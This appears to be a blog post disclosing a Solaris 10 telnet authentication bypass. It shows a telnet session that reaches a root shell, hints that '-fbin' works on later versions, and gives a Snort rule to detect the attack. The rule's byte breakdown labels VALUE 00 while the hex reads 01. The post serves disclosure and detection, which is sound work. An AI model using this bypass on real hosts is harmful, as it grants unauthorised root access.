On the full-disclosure list someone has posted another 0-day, this time for Solaris 10 and the upcoming 11. Initial evidence suggests that this does not affect prior versions. The vulnerability allows an attacker to log in as any user without authentication from remote. Contrary to what I've read on other sites, I have been able to confirm that this includes the ability to log in as root (on Solaris 10u1 anyway). What's even more scary is that no exploit code is required to execute, only a telnet client.
Here's an example of how easy it is to exploit this:
chris@pentest:~$ telnet ********** 172.30.1.113 Trying 172.30.1.113... Connected to 172.30.1.113. Escape character is '^]'. Last login: Sun Feb 11 21:31:24 from 172.30.1.202 Sun Microsystems Inc. SunOS 5.10 Generic January 2005 You have new mail. # uname -a;id SunOS unknown 5.10 Generic_118844-26 i86pc i386 i86pc uid=0(root) gid=0(root) #
The above example was against a default install Solaris 10 update 1 system. Although this would have been a big deal five years ago, today hopefully everyone has telnet disabled, especially from the Internet. I've written a Snort rule to detect this activity:
alert tcp any any -> any 23 (msg:"BLEEDING-EDGE EXPLOIT \ Solaris telnet USER environment vuln"; flow:to_server,established; \ content: "|ff fa 27 00 00 55 53 45 52 01 2d 66|"; rawbytes; \ classtype: attempted-user; sid:100002; rev:2;)
The content check is looking for:
ff fa (IAC SB) 27 (NEW-ENVIRON) 00 00 (IS VAR) 55 53 45 52 ("USER") 00 (VALUE) 2d 66
The RFCs for telnet are ftp://ftp.rfc-editor.org/in-notes/rfc854.txt and ftp://ftp.rfc-editor.org/in-notes/rfc1571.txt
Later versions of Solaris prompt during install if telnet should be
enabled. Also, in later versions this doesn't work for root - an
attacker would have to use -fbin or another account and than use a
local exploit to gain root.
The first blog sighting of this vulnerability can be found here: Errata Security. More information is at Computer Defense.
Some of the links about this vulnerability on these sites point to
pages that contain content that is not safe for a work environment.
If you are still using telnet, now's the time to disable it.